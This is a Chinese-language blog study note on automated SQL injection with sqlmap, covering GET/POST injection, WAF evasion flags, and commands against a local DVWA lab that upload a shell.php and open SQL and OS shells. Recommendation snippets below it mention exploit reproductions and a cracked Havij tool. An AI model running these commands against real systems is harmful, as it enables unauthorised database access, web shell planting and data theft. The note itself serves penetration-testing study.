安全学习笔记day9-sql注入之自动化注入

最新推荐文章于 2024-06-16 13:13:37 发布
最新推荐文章于 2024-06-16 13:13:37 发布
阅读量406 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sx234com/article/details/80349604
版权

0、内容有三(sqlmap,Havij-胡萝卜,Pangolin-穿山甲)

一、sqlmap提纲



二、学习顺序:



三、基本信息


1、GET方式注入

A、语法


基本:sqlmap -u url 后面可以跟 -f -p(当参数只有一个的时候没必要使用-p但是如果是多个参数时候例如username=aaa&pwd=aaaa时候 可以指定 -p username或者 -p pwd 或者不指定 也可) --users(用户信息) --banner(各个版本信息) --dbs(数据库信息) --all(全部信息罪毒辣) 

2、POST方法注入


基本语法:

sqlmap -r 保存的post头信息文件 

例如 : sqlmap -r post.txt

另外一种方法,带参数

A、带cookie的 sqlmap -u url --cookie="xxxx"

B、带data的    sqlmap -u url --data="username=admin&password=123456"


3、混淆注入

知识结构


语法:

检测对方waf : sqlmap -u url --identify-waf

绕过对方waf: 

sqlmap -u url --skip-waf --random-agent 通过使用随机agent

sqlmap -u url --skip-waf --random-agent --mobile 通过手机请求 使用随机agent

sqlmap -u url --skip-waf --random-agent --mobile --level 3 risk=2 提高安全/危险等级 通过手机请求 使用随机agent

sqlmap -u url --skip-waf --random-agent --mobile --smart  smart智能模式

sqlmap -u url --skip-waf --random-agent --mobile --smart  --offline  减少根对方的交互

4、代理注入:


5、高级注入:


上图语法使用 或者

sqlmap -u url --level=3 --risk=3


6、数据获取




7、提权操作


语句范例:

sqlmap -u http://192.168.56.103/dvwa/vulnerabilities/sqli/?id=23&Submit=Submit --file-write="../shell.php" --file-dest="tmp/shell.php"


sqlshell:

sqlmap -u http://192.168.56.103/dvwa/vulnerabilities/sqli/?id=23&Submit=Submit --sql-shell  数据库shell

sqlmap -u http://192.168.56.103/dvwa/vulnerabilities/sqli/?id=23&Submit=Submit --os-shell  操作系统shell

sqlmap -u http://192.168.56.103/dvwa/vulnerabilities/sqli/?id=23&Submit=Submit --cmd-shell  cmdshell




sx234com
关注
【0day】复现时空智友企业流程化管控系统SQL注入漏洞
记录并分享学习安全的知识点..
08-24 836
时空智友企业流程化管控系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化,从而提高工作效率、降低成本并提升管理水平。时空智友企业流程化管控系统存在SQL注入漏洞,攻击者通过恶意构造的SQL查询来执行未经授权的数据库操作。当应用程序未能正确验证、转义或过滤用户提供的输入数据时,攻击者可以利用这个漏洞来执行恶意的SQL语句,从而绕过应用程序的访问控制和执行非法操作。
【1day】复现任我行协同CRM存在SQL注入漏洞
记录并分享学习安全的知识点..
08-14 678
任我行CRM是CRM(客户关系管理)、OA(自动化办公)、OM(目标管理)、KM(知识管理)、HR(人力资源)一体化的企业管理软件。通过建立组织运营管理铁三角(目标行动-企业文化-知识复制),一切围绕以客户为中心的全方位、透明化业务管理(市场-销售-生产-服务),打造企业组织高效协同的运营管理平台。任我行协同CRM存在SQL注入漏洞,远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。
SQL注入-15】自动化注入案例—以sqli-labs-less9为例(利用sqlmap工具)
m0_64378913的博客
05-12 2682
目录1 前言[09:55:46] [INFO] testing connection to the target URL [09:55:46] [INFO] checking if the target is protected by some kind of WAF/IPS [09:55:46] [INFO] testing if the target URL content is stable [09:55:47] [INFO] target URL content is stable [09:55:4
SQL注入15】自动化注入技术(基于sqlmap工具和sqli-labs-less1靶场平台)
Fighting_hawk的博客
02-22 4573
1. SQLMAP很自动化,能极大提高工作效率; 2. 掌握SQLMAP的常用命令; 3. 通过SQLMAP自动化运行过程代码,加深对注入原理的理解。
Sqlmap(SQL注入自动化工具)
F2444790591的博客
07-16 3867
自动化SQL注入工具Sqlmap
[网络安全学习篇55]:SQL自动化注入
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-01 2564
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我...
自动化SQL注入工具-sqlmap
u013008898的博客
01-05 1541
1.通过burpsuite.获取拦截到的请求,指定文件进行探测 python sqlmap.py -r target.txt --current-db 2.通过url地址进行探测 Python sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" (-u参数指定目标注入地址)检测出存在可利用漏洞。 探测参数 1.列出所有的...
2020/2/19学习笔记-day01
01-20
【Java学习笔记-day01】 Java是一门广泛应用于软件开发的高级编程语言,自1995年诞生以来,经历了多次版本更新,逐渐发展成为现代软件工程的重要支柱。本篇笔记主要介绍了Java学习的一些基础知识,包括XML、面向...
崔希凡javaweb笔记day08-day13
11-09
崔希凡老师的javaweb笔记涵盖了从day08到day13的重要学习内容,这是传智播客官网上一套详尽的视频教程的配套资料。这些笔记和源码旨在帮助学员深入理解JavaWeb开发的核心技术,提升编程技能。以下是根据这些天的笔记...
[红日安全]学习笔记1—SQL注入实战攻防(SQLMap、DVWA、Pikachu)
ISNS的博客
04-21 1597
最近和同学聊天: 是我太菜。
sqlmap汉化修正版软件比穿山甲萝卜更厉害的注入工具
03-18
支持现在几乎所有的数据库,比国内的任何工具都强。我都开始怀疑穿山甲是不是源自于它。 支持get,post ,cookie注入。可以添加cookie和user-agent 支持盲注,错误回显注入,还有其他多种注入方法。 支持代理, 优化算法,更高效。 指纹识别技术判断数据库 注:这个只是汉化gui界面,没有py程序,需要到官方下载.或到脚本之家下载直接可用的版本
Havij破解版
10-25
1。支持数据库与注入方法:   MSSQL 2000 / 2005错误   MSSQL 2000 / 2005无错误联盟总部   MSSQL盲   MSSQL时基   基于MySQL的联盟   MySQL盲   基于MySQL的错误   MySQL的时间   基于Oracle的联盟   基于Oracle错误   Oracle盲   基于PostgreSQL的联盟   基于MS访问联盟   MS Access盲   Sybase(ASE)   Sybase(ASE)Blind   2。HTTPS支持   三.多线程   4。代理支持   5。自动信息服务器检测   6。自动参数类型检测(字符串或整数)   7。自动关键词检测(发现正面和负面的反应之间的区别)   8。自动扫描所有参数。   9。尝试完全不同的注射方法   10。替代房屋的选择,…针对IDS或过滤器   11。避免开发字符串(绕过magic_quotes和类似的过滤器)   12。手动注入语法支持   13。手动查询结果   14。强迫法外联盟   15。随机信号发生器   16。完全可定制的协议头(如参考,用户代理…)   17。从网站加载Cookie(s)进行身份验证   18。加载HTML类型的输入   19。协议基本和摘要认证   20。注入统一资源定位器重写页面   21。绕过防火墙和类似防火墙ModSecurity的互联网应用   22。绕过webknight互联网应用防火墙和类似防火墙   23。即时结果 软件特色   Havij这个注入工具大家应该多蛮清楚的吧,大牛小牛应该多有玩过。   算是比较著名也比较好用的SQL注入工具了。用的人也很多,它经常更新。   正版是要钱的。要感谢国内的破解大牛Hmily。每次多是它破解的最好用了。   这次这个也是它破解的。虽然网上有好几个版本。这个是免安装。注册一下控件就行了
SQL自动注入详细入门笔记(Sqlmap)
陆总的博客
09-02 993
SQL注入笔记 【目标:】拿到表中登录用户账号密码; 【注意:】全过程中,sql语句中的单引号都应该是英文下的单引号;需要提前准备好DVWA环境,可参考https://www.cnblogs.com/sevenbug/p/11417100.html; 入口 检测能否进行sql注入:输入单引号,点击提交报错 使用参数1’ or 1=1;#进行注入可以得到当前表下所有信息 可以通过1' or 1=1 order by 2;# (或9、8、7、6。。。依次尝试)判断出查询范围的字..
SQL注入自动化原理(盲注)
学生
05-25 496
SQL注入自动化原理(盲注) 11/23/2020 雨 寒风刺骨 今天一下午都在研究bool盲注 Length()函数 返回字符串的长度 Substr()截取字符串 Ascii()返回字符的ascii码 sleep(n):将程序挂起一段时间 n为n秒 if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句 可使用burp suite进行fuzzing测试 测试哪些函数被过滤 布尔型:页面只返回True和False两种类型页面。利用页面返回不同,逐个
10 个 SQL 注入工具(非常详细)零基础入门到精通,收藏这一篇就够了
leah126的博客
05-09 4734
其主要的目标是在存在着漏洞的数据库服务器上提供一个远程的外壳,甚至在一个有着严格的防范措施的环境中也能如此。Havij不仅能够自动挖掘可利用的SQL 查询,还能够识别后台数据库类型、检索数据的用户名和密码hash、转储表和列、从数据库中提取数据,甚至访问底层文件系统和执行系统命令,当然前提是有 一个可利用的SQL注入漏洞。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
浅谈Sql注入总结笔记整理(超详细)
最新发布
baimaozi008的博客
06-16 1077
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息,在实战和测试中,难免会遇见到一些sql注入,下面,我将总结一些常用sql注入中的不同姿势。
SQL注入
weixin_47081872的博客
09-26 662
SQL注入 一.SQL注入原理 1.造成的原因 当Web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。 2.本质 把用户输入的数据当做代码来执行,违背了“数据与代码分离”的原则。 3.SQL注入漏洞有两个关键条件: 3.1用户能控制输入的内容 3.2Web应用把用户输入的内容带入到数据库中执行 4.SQL注入的危害 4.1脱库 4.2getshell 二、万能密码 1.adm
网络安全-sqlmap注意项及高级使用
关注网络安全、云原生安全
07-12 2277
注意项 ip隐藏 跑一些python脚本获取免费ip代理,或者购买稳定的ip代理 --proxy=http://112.84.54.169:9999 UserAgent隐藏 参数:-A="你的UserAgent" 或者--random-agent 高级使用
基于PHPCMS的SQL注入(Havij)
未名编程
07-17 2097
本教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险。 目录实验目的实验环境实验原理实验步骤第一步靶机操作第二步渗透主机操作实验总结 实验目的 通过本实验理解SQL注入基本原理和过程,掌握菜刀和Havij等注入工具的使用方法,了解SQL注入的危害。通过本实验,掌握SQL注入点识别方法、测试方法、自动化工具使用方法以及进行防御的基本方法。 实验环境 测试渗透机:win2k8SvrTester 工具:中国菜刀、Havij 目标服务器(靶机):phpcms网站 目标网站:http://IP:80.
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值